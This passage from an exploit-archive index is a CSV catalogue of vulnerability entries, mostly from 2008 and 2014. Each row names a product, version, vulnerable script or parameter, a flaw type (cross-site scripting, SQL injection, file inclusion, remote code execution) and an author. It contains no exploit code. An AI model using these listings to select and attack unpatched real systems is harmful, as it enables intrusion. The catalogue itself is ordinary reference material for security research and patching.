Disclosure",2014-03-10,"Charlie Campbell & Lyndon Mendoza",asp,webapps,80 -32161,exploits/hardware/webapps/32161.txt,"Huawei E5331 MiFi Mobile Hotspot 21.344.11.00.414 - Multiple Vulnerabilities",2014-03-10,"SEC Consult",hardware,webapps,80 -32162,exploits/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - 'upload.php?Filename' Remote Code Execution",2014-03-10,Portcullis,multiple,webapps,80 -32168,exploits/php/webapps/32168.txt,"Pluck CMS 4.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,"Khashayar Fereidani",php,webapps, -32169,exploits/php/webapps/32169.txt,"Crafty Syntax Live Help 2.14.6 - 'livehelp_js.php' Cross-Site Scripting",2008-08-05,CoRSaNTuRK,php,webapps, -32170,exploits/php/webapps/32170.txt,"Softbiz Image Gallery - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,sl4xUz,php,webapps, -32171,exploits/php/webapps/32171.txt,"Softbiz Image Gallery - 'images.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,sl4xUz,php,webapps, -32172,exploits/php/webapps/32172.txt,"Softbiz Image Gallery - 'suggest_image.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,sl4xUz,php,webapps, -32173,exploits/php/webapps/32173.txt,"Softbiz Image Gallery - 'image_desc.php?latest' Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps, -32174,exploits/php/webapps/32174.txt,"Softbiz Image Gallery - 'adminhome.php?msg' Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps, -32175,exploits/php/webapps/32175.txt,"Softbiz Image Gallery - 'config.php?msg' Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps, -32176,exploits/php/webapps/32176.txt,"Softbiz Image Gallery - 'changepassword.php?msg' Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps, -32177,exploits/php/webapps/32177.txt,"Softbiz Image Gallery - 'cleanup.php?msg' Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps, -32178,exploits/php/webapps/32178.txt,"Softbiz Image Gallery - 'browsecats.php?msg' Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps, -32179,exploits/php/webapps/32179.txt,"POWERGAP ShopSystem - 's03.php' SQL Injection",2008-08-05,"Rohit Bansal",php,webapps, -32180,exploits/php/webapps/32180.txt,"Chupix CMS Contact Module 0.1 - 'index.php' Multiple Local File Inclusions",2008-08-06,casper41,php,webapps, -32181,exploits/php/webapps/32181.txt,"Battle.net Clan Script 1.5.x - 'index.php' Multiple SQL Injections",2008-08-06,"Khashayar Fereidani",php,webapps, -32182,exploits/php/webapps/32182.txt,"PHPKF-Portal 1.10 - 'baslik.php?tema_dizin' Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps, -32183,exploits/php/webapps/32183.txt,"PHPKF-Portal 1.10 - 'anket_yonetim.php?portal_ayarlarportal_dili' Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps, -32184,exploits/asp/webapps/32184.txt,"KAPhotoservice - 'order.asp?page' Cross-Site Scripting",2008-08-06,by_casper41,asp,webapps, -32185,exploits/asp/webapps/32185.txt,"KAPhotoservice - 'search.asp?Filename' Cross-Site Scripting",2008-08-06,by_casper41,asp,webapps, -32186,exploits/php/webapps/32186.txt,"Quate CMS 0.3.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-06,CraCkEr,php,webapps, -32187,exploits/php/webapps/32187.txt,"Joomla! / Mambo Component com_utchat 0.2 - Multiple Remote File Inclusions",2008-08-06,by_casper41,php,webapps, -32188,exploits/php/webapps/32188.txt,"WebmasterSite (Multiple Products) - Remote Command Execution",2008-08-06,otmorozok428,php,webapps, -32190,exploits/php/webapps/32190.txt,"Kshop 2.22 - 'kshop_search.php' Cross-Site Scripting",2008-08-06,Lostmon,php,webapps, -32191,exploits/php/webapps/32191.txt,"PHP-Nuke Kleinanzeigen Module - 'lid' SQL Injection",2008-08-06,Lovebug,php,webapps, -32196,exploits/php/webapps/32196.txt,"RMSOFT MiniShop 1.0 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-09,Lostmon,php,webapps, -32198,exploits/php/webapps/32198.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'friends.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps, -32199,exploits/php/webapps/32199.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'seutubo.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps, -32200,exploits/php/webapps/32200.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'album.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps, -32201,exploits/php/webapps/32201.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'scrapbook.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps, -32202,exploits/php/webapps/32202.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'index.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps, -32203,exploits/php/webapps/32203.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'tribes.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps, -32204,exploits/hardware/webapps/32204.txt,"ZYXEL P-660HN-T1A Router - Authentication Bypass",2014-03-12,"Michael Grifalconi",hardware,webapps, -32282,exploits/php/webapps/32282.txt,"Church Edit - Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps, -32207,exploits/php/webapps/32207.txt,"GNUPanel 0.3.5_R4 - Multiple Vulnerabilities",2014-03-12,"Necmettin COSKUN",php,webapps,80 -32211,exploits/php/webapps/32211.txt,"LuxCal 3.2.2 - Cross-Site Request Forgery / Blind SQL Injection",2014-03-12,"TUNISIAN CYBER",php,webapps,80 -32212,exploits/asp/webapps/32212.txt,"Procentia IntelliPen 1.1.12.1520 - 'data.aspx' Blind SQL Injection",2014-03-12,Portcullis,asp,webapps,80 -32213,exploits/php/webapps/32213.txt,"vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion",2014-03-12,Portcullis,php,webapps,80 -32217,exploits/php/webapps/32217.txt,"Linkspider 1.08 - Multiple Remote File Inclusions",2008-08-08,"Rohit Bansal",php,webapps, -32218,exploits/php/webapps/32218.txt,"Domain Group Network GooCMS 1.02 - 'index.php' Cross-Site Scripting",2008-08-11,ahmadbaby,php,webapps, -32219,exploits/php/webapps/32219.txt,"Kayako SupportSuite 3.x - '/visitor/index.php?sessionid' Cross-Site Scripting",2008-08-11,"James Bercegay",php,webapps, -32220,exploits/php/webapps/32220.txt,"Kayako SupportSuite 3.x - 'index.php?filter' Cross-Site Scripting",2008-08-11,"James Bercegay",php,webapps, -32221,exploits/php/webapps/32221.txt,"Kayako SupportSuite 3.x - '/staff/index.php?customfieldlinkid' SQL Injection",2008-08-11,"James Bercegay",php,webapps, -32226,exploits/php/webapps/32226.txt,"Datafeed Studio - 'patch.php' Remote File Inclusion",2008-08-12,"Bug Researchers Group",php,webapps, -32227,exploits/php/webapps/32227.txt,"Datafeed Studio 1.6.2 - 'search.php' Cross-Site Scripting",2008-08-12,"Bug Researchers Group",php,webapps, -32230,exploits/php/webapps/32230.txt,"IDevSpot PHPLinkExchange 1.01/1.02 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-12,sl4xUz,php,webapps, -32231,exploits/php/webapps/32231.txt,"Meet#Web 0.8 - 'modules.php?root_path' Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps, -32232,exploits/php/webapps/32232.txt,"Meet#Web 0.8 - 'ManagerResource.class.php?root_path' Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps, -32233,exploits/php/webapps/32233.txt,"Meet#Web 0.8 - 'ManagerRightsResource.class.php?root_path' Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps, -32234,exploits/php/webapps/32234.txt,"Meet#Web 0.8 - 'RegForm.class.php?root_path' Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps, -32235,exploits/php/webapps/32235.txt,"Meet#Web 0.8 - 'RegResource.class.php?root_path' Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps, -32236,exploits/php/webapps/32236.txt,"Meet#Web 0.8 - 'RegRightsResource.class.php?root_path' Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps, -32237,exploits/hardware/webapps/32237.txt,"Ubee EVW3200 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-03-13,"Jeroen - IT Nerdbox",hardware,webapps, -32238,exploits/hardware/webapps/32238.txt,"Ubee EVW3200 - Cross-Site Request Forgery",2014-03-13,"Jeroen - IT Nerdbox",hardware,webapps, -32239,exploits/php/webapps/32239.txt,"Fonality trixbox - SQL Injection",2014-03-13,Sc4nX,php,webapps, -32249,exploits/jsp/webapps/32249.txt,"Openfire 3.5.2 - 'login.jsp' Cross-Site Scripting",2008-08-14,"Daniel Henninger",jsp,webapps, -32250,exploits/php/webapps/32250.py,"mUnky 0.01 - 'index.php' Remote Code Execution",2008-08-15,"Khashayar Fereidani",php,webapps, -32251,exploits/php/webapps/32251.txt,"PHPizabi 0.848b C1 HP3 - 'id' Local File Inclusion",2008-08-15,Lostmon,php,webapps, -32252,exploits/php/webapps/32252.txt,"Mambo Open Source 4.6.2 - '/administrator/popups/index3pop.php?mosConfig_sitename' Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",php,webapps, -32253,exploits/php/webapps/32253.txt,"Mambo Open Source 4.6.2 - '/mambots/editors/mostlyce/' PHP/connector.php?Query String Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",php,webapps, -32254,exploits/php/webapps/32254.txt,"FlexCMS 2.5 - 'inc-core-admin-editor-previouscolorsjs.php' Cross-Site Scripting",2008-08-15,Dr.Crash,php,webapps, -32255,exploits/asp/webapps/32255.txt,"FipsCMS 2.1 - 'neu.asp' SQL Injection",2008-08-15,U238,asp,webapps, -32257,exploits/php/webapps/32257.txt,"PromoProducts - 'view_product.php' Multiple SQL Injections",2008-08-15,baltazar,php,webapps, -32258,exploits/cgi/webapps/32258.txt,"AWStats 6.8 - 'AWStats.pl' Cross-Site Scripting",2008-08-18,"Morgan Todd",cgi,webapps, -32259,exploits/php/webapps/32259.txt,"Freeway 1.4.1.171 - '/english/account.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps, -33409,exploits/php/webapps/33409.txt,"Article Directory - 'login.php' SQL Injection",2009-12-16,"R3d D3v!L",php,webapps, -32285,exploits/php/webapps/32285.txt,"vBulletin 3.6.10/3.7.2 - '$newpm[title]' Cross-Site Scripting",2008-08-20,"Core Security",php,webapps, -32263,exploits/php/webapps/32263.txt,"Fonality trixbox - 'mac' Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80 -32264,exploits/php/webapps/32264.txt,"Freeway 1.4.1.171 - '/french/account_newsletters.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps, -32265,exploits/php/webapps/32265.txt,"Freeway 1.4.1.171 - '/includes/modules/faqdesk/faqdesk_article_require.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps, -32266,exploits/php/webapps/32266.txt,"Freeway 1.4.1.171 - '/includes/modules/newsdesk/newsdesk_article_require.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps, -32267,exploits/php/webapps/32267.txt,"Freeway 1.4.1.171 - '/templates/Freeway/boxes/card1.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps, -32268,exploits/php/webapps/32268.txt,"Freeway 1.4.1.171 - '/templates/Freeway/boxes/loginbox.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps, -32269,exploits/php/webapps/32269.txt,"Freeway 1.4.1.171 - '/templates/Freeway/boxes/whos_online.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps, -32270,exploits/php/webapps/32270.txt,"Freeway 1.4.1.171 - '/templates/Freeway/mainpage_modules/mainpage.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps, -32271,exploits/php/webapps/32271.txt,"NewsHOWLER 1.03 - Cookie Data SQL Injection",2008-08-18,"Khashayar Fereidani",php,webapps, -32272,exploits/php/webapps/32272.txt,"Ovidentia 6.6.5 - 'index.php' Cross-Site Scripting",2008-08-18,"ThE dE@Th",php,webapps, -32368,exploits/jsp/webapps/32368.txt,"McAfee Asset Manager 6.6 - Multiple Vulnerabilities",2014-03-19,"Brandon Perry",jsp,webapps,80 -32274,exploits/php/webapps/32274.txt,"Synology DSM 4.3-3827 - 'article.php' Blind SQL Injection",2014-03-14,"Michael Wisniewski",php,webapps,80 -32275,exploits/php/webapps/32275.txt,"itMedia - Multiple SQL Injections",2008-08-18,baltazar,php,webapps, -32278,exploits/asp/webapps/32278.txt,"K Web CMS - 'sayfala.asp' SQL Injection",2008-08-18,baltazar,asp,webapps, -32279,exploits/php/webapps/32279.txt,"Vanilla 1.1.4 - HTML Injection / Cross-Site Scripting",2008-08-19,"James Bercegay",php,webapps, -32280,exploits/php/webapps/32280.txt,"YourFreeWorld Ad-Exchange Script - 'id' SQL Injection",2008-08-20,"Hussin X",php,webapps, -32281,exploits/php/webapps/32281.cs,"Folder Lock 5.9.5 - Weak Password Encryption Local Information Disclosure",2008-06-19,"Charalambous Glafkos",php,webapps, -32287,exploits/php/webapps/32287.txt,"FAR-PHP 1.0 - 'index.php' Local File Inclusion",2008-08-21,"Beenu Arora",php,webapps, -32288,exploits/php/webapps/32288.txt,"TimeTrex Time 2.2 and Attendance Module - Multiple Cross-Site Scripting Vulnerabilities",2008-08-21,Doz,php,webapps, -32290,exploits/php/webapps/32290.txt,"Accellion File Transfer - Multiple Cross-Site Scripting Vulnerabilities",2008-08-22,"Eric Beaulieu",php,webapps, -32291,exploits/php/webapps/32291.txt,"PicturesPro Photo Cart 3.9 - Search Cross-Site Scripting",2008-08-22,"Tyler Trioxide",php,webapps, -32293,exploits/php/webapps/32293.txt,"One-News - Multiple Input Validation Vulnerabilities",2008-08-23,suN8Hclf,php,webapps, -32295,exploits/php/webapps/32295.txt,"PHP-Ultimate WebBoard 2.0 - 'admindel.php' Multiple Input Validation Vulnerabilities",2008-08-25,t0pP8uZz,php,webapps, -32296,exploits/php/webapps/32296.txt,"Bluemoon inc. PopnupBlog 3.30 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-25,Lostmon,php,webapps, -32297,exploits/asp/webapps/32297.txt,"Smart Survey 1.0 - 'surveyresults.asp' Cross-Site Scripting",2008-08-26,"Bug Researchers Group",asp,webapps, -32298,exploits/php/webapps/32298.txt,"HPSystem Management Homepage (SMH) 2.1.12 - 'message.php' Cross-Site Scripting",2008-08-26,"Luca Carettoni",php,webapps, -32299,exploits/php/webapps/32299.txt,"MatterDaddy Market 1.1 - 'login.php' Cross-Site Scripting",2008-08-26,"Sam Georgiou",php,webapps, -32300,exploits/asp/webapps/32300.txt,"Educe ASP Search Engine 1.5.6 - 'search.asp' Cross-Site Scripting",2008-08-26,JoCk3r,asp,webapps, -32302,exploits/php/webapps/32302.txt,"AbleSpace 1.0 - 'adv_cat.php' Cross-Site Scripting",2008-08-27,"Bug Researchers Group",php,webapps, -32306,exploits/php/webapps/32306.txt,"dotProject 2.1.2 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2008-08-29,C1c4Tr1Z,php,webapps, -32307,exploits/php/webapps/32307.txt,"vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-01,"Fabian Fingerle",php,webapps, -32308,exploits/php/webapps/32308.txt,"GenPortal - 'buscarCat.php' Cross-Site Scripting",2008-09-01,sl4xUz,php,webapps, -32309,exploits/php/webapps/32309.txt,"Full PHP Emlak Script - 'landsee.php' SQL Injection",2008-08-29,"Hussin X",php,webapps, -32312,exploits/php/webapps/32312.txt,"IDevSpot BizDirectory 2.04 - 'page' Cross-Site Scripting",2008-09-02,Am!r,php,webapps, -32313,exploits/php/webapps/32313.txt,"OpenDB 1.0.6 - 'user_admin.php?user_id' Cross-Site Scripting",2008-08-28,C1c4Tr1Z,php,webapps, -32314,exploits/php/webapps/32314.txt,"OpenDB 1.0.6 - 'listings.php?title' Cross-Site Scripting",2008-08-28,C1c4Tr1Z,php,webapps, -32315,exploits/php/webapps/32315.txt,"OpenDB 1.0.6 - 'user_profile.php?redirect_url' Cross-Site Scripting",2008-08-28,C1c4Tr1Z,php,webapps, -32316,exploits/php/webapps/32316.txt,"eliteCMS 1.0 - 'page' SQL Injection",2008-09-03,e.wiZz!,php,webapps, -32317,exploits/php/webapps/32317.txt,"@Mail 5.42 and @Mail WebMail 5.0.5 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-03,C1c4Tr1Z,php,webapps, -32318,exploits/php/webapps/32318.txt,"XRms 1.99.2 - 'login.php?target' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps, -32319,exploits/php/webapps/32319.txt,"OpenSupports 2.x - Authentication Bypass / Cross-Site Request Forgery",2014-03-17,"TN CYB3R",php,webapps, -32320,exploits/php/webapps/32320.txt,"XRms 1.99.2 - 'title' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps, -32321,exploits/php/webapps/32321.txt,"XRms 1.99.2 - 'company_name' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps, -32322,exploits/php/webapps/32322.txt,"XRms 1.99.2 - 'last_name' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps, -32323,exploits/php/webapps/32323.txt,"XRms 1.99.2 - 'campaign_title' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps, -32324,exploits/php/webapps/32324.txt,"XRms 1.99.2 - 'opportunity_title' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps, -32325,exploits/php/webapps/32325.txt,"XRms 1.99.2 - 'case_title' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps, -32326,exploits/php/webapps/32326.txt,"XRms 1.99.2 - 'file_id' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps, -32327,exploits/php/webapps/32327.txt,"XRms 1.99.2 - 'starting' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps, -32330,exploits/php/webapps/32330.txt,"OpenSupports 2.0 - Blind SQL Injection",2014-03-17,indoushka,php,webapps, -32331,exploits/php/webapps/32331.txt,"Joomla! Component AJAX Shoutbox 1.6 - SQL Injection",2014-03-17,"Ibrahim Raafat",php,webapps, -32334,exploits/php/webapps/32334.txt,"CeleronDude Uploader 6.1 - 'account.php' Cross-Site Scripting",2008-09-03,Xc0re,php,webapps, -32337,exploits/php/webapps/32337.txt,"Silentum LoginSys 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-06,"Maximiliano Soler",php,webapps, -32338,exploits/php/webapps/32338.txt,"phpAdultSite CMS - 'results_per_page' Cross-Site Scripting",2008-09-07,"David Sopas",php,webapps, -32340,exploits/php/webapps/32340.txt,"Gallery 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-08,sl4xUz,php,webapps, -32342,exploits/php/webapps/32342.txt,"eXtrovert software Thyme 1.3 - 'pick_users.php' SQL Injection",2008-09-08,"Omer Singer",php,webapps, -32346,exploits/php/webapps/32346.txt,"E-PHP B2B Trading Marketplace Script - 'listings.php' SQL Injection",2008-09-07,r45c4l,php,webapps, -32347,exploits/php/webapps/32347.txt,"UBBCentral UBB.Threads 7.3.1 - 'Forum[]' Array SQL Injection",2008-09-02,"James Bercegay",php,webapps, -32351,exploits/php/webapps/32351.txt,"Jaw Portal 1.2 - 'index.php' Multiple Local File Inclusions",2008-09-10,SirGod,php,webapps, -32352,exploits/php/webapps/32352.txt,"AvailScript Job Portal Script - 'applynow.php' SQL Injection",2008-09-10,InjEctOr5,php,webapps, -32353,exploits/php/webapps/32353.txt,"Horde Application Framework 3.2.1 - Forward Slash Insufficient Filtering Cross-Site Scripting",2008-09-10,"Alexios Fakos",php,webapps, -32354,exploits/php/webapps/32354.txt,"Horde 3.2 - MIME Attachment Filename Insufficient Filtering Cross-Site Scripting",2008-09-10,"Alexios Fakos",php,webapps, -32355,exploits/php/webapps/32355.txt,"Hot Links SQL-PHP - 'news.php' SQL Injection",2008-09-10,r45c4l,php,webapps, -32360,exploits/php/webapps/32360.txt,"Nooms 1.1 - 'smileys.php?page_id' Cross-Site Scripting",2008-09-11,Dr.Crash,php,webapps, -32361,exploits/php/webapps/32361.txt,"Nooms 1.1 - 'search.php?q' Cross-Site Scripting",2008-09-11,Dr.Crash,php,webapps, -32364,exploits/php/webapps/32364.txt,"Dynamic MP3 Lister 2.0.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps, -32365,exploits/php/webapps/32365.txt,"Paranews 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps, -32366,exploits/php/webapps/32366.txt,"QuicO - 'photo.php' SQL Injection",2008-09-12,"Beenu Arora",php,webapps, -32369,exploits/hardware/webapps/32369.txt,"Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 - Multiple Vulnerabilities",2014-03-19,xistence,hardware,webapps, -32374,exploits/ios/webapps/32374.txt,"Wireless Drive 1.1.0 iOS - Multiple Web Vulnerabilities",2014-03-20,Vulnerability-Lab,ios,webapps, -32375,exploits/php/webapps/32375.txt,"OXID eShop < 4.7.11/5.0.11 / < 4.8.4/5.1.4 - Multiple Vulnerabilities",2014-03-20,//sToRm,php,webapps, -32383,exploits/php/webapps/32383.txt,"phpMyAdmin 3.2 - 'server_databases.php' Remote Command Execution",2008-09-15,"Norman Hippert",php,webapps, -32385,exploits/hardware/webapps/32385.txt,"D-Link DIR-600L AX 1.00 - Cross-Site Request Forgery",2014-03-20,"Dhruv Shah",hardware,webapps, -32418,exploits/php/webapps/32418.txt,"EasyRealtorPRO 2008 - 'site_search.php' Multiple SQL Injections",2008-09-25,"David Sopas",php,webapps, -32419,exploits/php/webapps/32419.pl,"Libra File Manager 1.18/2.0 - 'fileadmin.php' Local File Inclusion",2008-09-25,Pepelux,php,webapps, -32421,exploits/php/webapps/32421.html,"Flatpress 0.804 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps, -32422,exploits/php/webapps/32422.txt,"Vikingboard 0.2 Beta - 'register.php' SQL Column Truncation Unauthorized Access",2008-09-25,StAkeR,php,webapps, -32423,exploits/jsp/webapps/32423.txt,"OpenNMS 1.5.x - 'j_username' Cross-Site Scripting",2008-09-25,d2d,jsp,webapps, -32424,exploits/jsp/webapps/32424.txt,"OpenNMS 1.5.x - 'Username' Cross-Site Scripting",2008-09-25,d2d,jsp,webapps, -32425,exploits/jsp/webapps/32425.txt,"OpenNMS 1.5.x - 'filter' Cross-Site Scripting",2008-09-25,d2d,jsp,webapps, -32427,exploits/php/webapps/32427.txt,"Barcode Generator 2.0 - 'LSTable.php' Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps, -32430,exploits/cgi/webapps/32430.txt,"WhoDomLite 1.1.3 - 'wholite.cgi' Cross-Site Scripting",2008-09-27,"Ghost Hacker",cgi,webapps, -32431,exploits/php/webapps/32431.txt,"Lyrics Script - 'search_results.php' Cross-Site Scripting",2008-09-27,"Ghost Hacker",php,webapps, -32432,exploits/php/webapps/32432.txt,"ClickBank Portal - 'search.php' Cross-Site Scripting",2008-09-27,"Ghost Hacker",php,webapps, -32433,exploits/php/webapps/32433.txt,"Membership Script - Multiple Cross-Site Scripting Vulnerabilities",2008-09-27,"Ghost Hacker",php,webapps, -32434,exploits/php/webapps/32434.txt,"Recipe Script - 'search.php' Cross-Site Scripting",2008-09-27,"Ghost Hacker",php,webapps, -32437,exploits/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated Remote Code Execution",2014-03-22,"Brandon Perry",php,webapps, -32441,exploits/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 - Cookie Authentication Bypass",2008-09-29,Crackers_Child,php,webapps, -32443,exploits/php/webapps/32443.txt,"CAcert - 'analyse.php' Cross-Site Scripting",2008-09-29,"Alexander Klink",php,webapps, -32444,exploits/php/webapps/32444.txt,"WordPress MU 1.2/1.3 - '/wp-admin/wpmu-blogs.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-29,"Juan Galiana Lara",php,webapps, -32447,exploits/php/webapps/32447.txt,"A4Desk Event Calendar - 'v' Remote File Inclusion",2008-09-30,Lo$er,php,webapps, -32448,exploits/java/webapps/32448.txt,"Celoxis - Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,teuquooch1seero,java,webapps, -32449,exploits/php/webapps/32449.txt,"H-Sphere WebShell 4.3.10 - 'actions.php' Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,C1c4Tr1Z,php,webapps, -32450,exploits/php/webapps/32450.txt,"WikyBlog 1.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,"Omer Singer",php,webapps, -32453,exploits/php/webapps/32453.txt,"Dreamcost HostAdmin 3.1 - 'index.php' Cross-Site Scripting",2008-10-02,Am!r,php,webapps, -32455,exploits/php/webapps/32455.pl,"Website Directory - 'index.php' Cross-Site Scripting",2008-10-03,"Ghost Hacker",php,webapps, -32459,exploits/java/webapps/32459.txt,"VeriSign Kontiki Delivery Management System 5.0 - 'action' Cross-Site Scripting",2008-10-05,"Mazin Faour",java,webapps, -32461,exploits/php/webapps/32461.txt,"AmpJuke 0.7.5 - 'index.php' SQL Injection",2008-10-03,S_DLA_S,php,webapps, -32462,exploits/php/webapps/32462.txt,"Simple Machines Forum (SMF) 1.1.6 - 'POST' Filter Security Bypass",2008-10-06,WHK,php,webapps, -32463,exploits/php/webapps/32463.txt,"PHP Web Explorer 0.99b - 'main.php?refer' Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps, -32464,exploits/php/webapps/32464.txt,"PHP Web Explorer 0.99b - 'edit.php?File' Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps, -32467,exploits/php/webapps/32467.txt,"Opera Web Browser 8.51 - URI redirection Remote Code Execution",2008-10-08,MATASANOS,php,webapps, -32468,exploits/php/webapps/32468.txt,"DFFFrameworkAPI - 'DFF_config[dir_include]' Multiple Remote File Inclusions",2008-10-08,GoLd_M,php,webapps, -32473,exploits/php/webapps/32473.txt,"Joomla! Component com_jeux - 'id' SQL Injection",2008-10-11,H!tm@N,php,webapps, -32474,exploits/php/webapps/32474.txt,"EEB-CMS 0.95 - 'index.php' Cross-Site Scripting",2008-10-11,d3v1l,php,webapps, -32479,exploits/php/webapps/32479.txt,"BigDump 0.35b - Arbitrary File Upload",2014-03-24,"felipe andrian",php,webapps, -32520,exploits/php/webapps/32520.txt,"OpenCart 1.5.6.1 - 'openbay' Multiple SQL Injections",2014-03-26,"Saadi Siddiqui",php,webapps, -32563,exploits/php/webapps/32563.txt,"YourFreeWorld Downline Builder Pro - 'tr.php' SQL Injection",2008-11-02,"Hussin X",php,webapps, -32485,exploits/asp/webapps/32485.txt,"ASP Indir Iltaweb Alisveris Sistemi - 'xurunler.asp' SQL Injection",2008-10-13,tRoot,asp,webapps, -32486,exploits/php/webapps/32486.txt,"Webscene eCommerce - 'productlist.php' SQL Injection",2008-10-14,"Angela Chang",php,webapps, -32487,exploits/php/webapps/32487.txt,"Elxis CMS 2008.1 - '/modules/mod_language.php' Multiple Cross-Site Scripting Vulnerabilities",2008-10-14,faithlove,php,webapps, -32488,exploits/php/webapps/32488.txt,"Elxis CMS 2008.1 - PHPSESSID Variable Session Fixation",2008-10-14,faithlove,php,webapps, -32490,exploits/php/webapps/32490.txt,"SweetCMS 1.5.2 - 'index.php' SQL Injection",2008-10-14,Dapirates,php,webapps, -32492,exploits/php/webapps/32492.txt,"Habari 0.5.1 - 'habari_username' Cross-Site Scripting",2008-10-16,faithlove,php,webapps, -32494,exploits/php/webapps/32494.txt,"FlashChat - 'connection.php' Role Filter Security Bypass",2008-10-17,eLiSiA,php,webapps, -32495,exploits/php/webapps/32495.txt,"Jetbox CMS 2.1 - '/admin/cms/images.php?orderby' SQL Injection",2008-10-20,"Omer Singer",php,webapps, -32496,exploits/php/webapps/32496.txt,"Jetbox CMS 2.1 - '/admin/cms/nav.php?nav_id' SQL Injection",2008-10-20,"Omer Singer",php,webapps, -32497,exploits/php/webapps/32497.txt,"PHP-Nuke Sarkilar Module - 'id' SQL Injection",2008-10-20,r45c4l,php,webapps, -32498,exploits/asp/webapps/32498.txt,"Dizi Portali - 'diziler.asp' SQL Injection",2008-10-21,"CyberGrup Lojistik",asp,webapps, -32499,exploits/php/webapps/32499.txt,"PHPhotoGallery 0.92 - 'index.php' SQL Injection",2008-10-21,KnocKout,php,webapps, -32500,exploits/asp/webapps/32500.txt,"Bahar Download Script 2.0 - 'aspkat.asp' SQL Injection",2008-10-21,"CyberGrup Lojistik",asp,webapps, -32502,exploits/php/webapps/32502.txt,"Getsimple CMS 3.3.1 - Persistent Cross-Site Scripting",2014-03-25,"Jeroen - IT Nerdbox",php,webapps, -32503,exploits/php/webapps/32503.txt,"Cart Engine 3.0.0 - Remote Code Execution",2014-03-25,LiquidWorm,php,webapps, -32504,exploits/php/webapps/32504.txt,"Cart Engine 3.0.0 - 'task.php' Local File Inclusion",2014-03-25,LiquidWorm,php,webapps, -32505,exploits/php/webapps/32505.txt,"Cart Engine 3.0.0 - Database Backup Disclosure",2014-03-25,LiquidWorm,php,webapps, -32506,exploits/php/webapps/32506.txt,"Kemana Directory 1.5.6 - kemana_admin_passwd Cookie User Password Hash Disclosure",2014-03-25,LiquidWorm,php,webapps, 